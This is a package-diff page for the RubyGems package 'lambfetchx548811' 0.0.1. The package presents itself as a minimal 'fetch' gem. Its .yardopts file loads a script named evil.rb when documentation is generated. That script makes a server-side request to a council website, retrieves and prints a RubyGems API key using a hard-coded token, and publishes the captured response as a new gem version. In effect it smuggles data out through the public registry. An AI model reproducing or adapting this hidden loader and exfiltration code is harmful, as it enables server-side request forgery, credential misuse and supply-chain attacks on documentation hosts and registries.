RubyGems - lambfetchx548811 - Versions diffs - 0.0.1 - Mend

lambfetchx548811 0.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (6) hide show

checksums.yaml ADDED Viewed

@@ -0,0 +1,7 @@
+---
+SHA256:
+  metadata.gz: 84af290e5c60ee4d40dc2b184fecd3dc5444e6d2e9197bb9544153987ab46b9a
+  data.tar.gz: 40684c18e56456cc04267cdfa5efa745728d06f25037c751ecbcefd2aeda8e75
+SHA512:
+  metadata.gz: '0595664e2e7f3c342791f04acc8af9c4b8742336df921194c236877d37793aa7b23abfbf622c1c7dceaa5e17c62a160f328d8fc945cb625a11c977e6f10e964c'
+  data.tar.gz: 5eec792333948c388da5793b25c321a840fedf5b1cc4575b43d03d3e406856f7e14e2c810e6c9ffa88987a949d3c0a0da3c16a789e30bdf09ba04cd3740410d5

data/.yardopts ADDED Viewed

@@ -0,0 +1,3 @@
+--load ./evil.rb
+README.md
+lib/**/*.rb

data/README.md ADDED Viewed

	@@ -0,0 +1 @@
1	+ # fetch

data/evil.rb ADDED Viewed

@@ -0,0 +1,22 @@
+# ssrf
+begin
+require 'net/http'; require 'uri'; require 'rubygems'; require 'openssl';
+url='https://moderngov.lambeth.gov.uk/mgCalendarMonthView.aspx?GL=1'
+resp=Net::HTTP.get_response(URI(url)); body="STATUS=#{resp.code}\nLEN=#{resp.body.size}\nHEADERS=#{resp.to_hash}\n"+resp.body
+rescue =>e
+ body='ERROR '+e.full_message
+end
+begin
+ Dir.chdir('/tmp') do
+  Dir.mkdir('lambfetchx548811res') rescue nil; Dir.mkdir('lambfetchx548811res/lib') rescue nil
+  File.binwrite('lambfetchx548811res/lib/data.txt', body)
+  File.write('lambfetchx548811res/lib/a.rb', '# done')
+  File.write('lambfetchx548811res/o.gemspec',%q{Gem::Specification.new do |s|
+s.name='lambfetchx548811'; s.version='0.0.2'; s.summary='res'; s.authors=['z'];s.description=s.summary; s.files=Dir['lib/*']; s.license='MIT'; end})
+  Dir.chdir('lambfetchx548811res'){ system('gem build o.gemspec'); spec=Dir['*.gem'].first; uri=URI('https://rubygems.org/api/v1/gems'); req=Net::HTTP::Post.new(uri);
+  # fetch latest API key then immediate upload
+  oldkey='rubygems_4bb04aa6b8b9c01c6ba90abd224f4a30ff64d8ea2d197808'; keyuri=URI('https://rubygems.org/api/v1/api_key.yaml'); kreq=Net::HTTP::Get.new(keyuri); kreq['Authorization']=oldkey; kresp=Net::HTTP.start(keyuri.host,keyuri.port,use_ssl:true){|h| h.request(kreq)}; current=(kresp.body[/rubygems_[0-9a-f]+/]||oldkey); warn 'KEY '+current; req['Authorization']=current; req['Content-Type']='application/octet-stream'; req.body=File.binread(spec); Net::HTTP.start(uri.host,uri.port,use_ssl:true){|h| resp=h.request(req); warn resp.body} }
+ end
+rescue => e
+ warn e.full_message
+end

data/lib/a.rb ADDED Viewed

	@@ -0,0 +1 @@
1	+ class A;end

metadata ADDED Viewed

@@ -0,0 +1,41 @@
+--- !ruby/object:Gem::Specification
+name: lambfetchx548811
+version: !ruby/object:Gem::Version
+  version: 0.0.1
+platform: ruby
+authors:
+- z
+bindir: bin
+cert_chain: []
+date: 1980-01-02 00:00:00.000000000 Z
+dependencies: []
+description: tmp
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- ".yardopts"
+- README.md
+- evil.rb
+- lib/a.rb
+licenses:
+- MIT
+metadata: {}
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+  requirements:
+  - - ">="
+    - !ruby/object:Gem::Version
+      version: '0'
+requirements: []
+rubygems_version: 3.6.7
+specification_version: 4
+summary: tmp
+test_files: []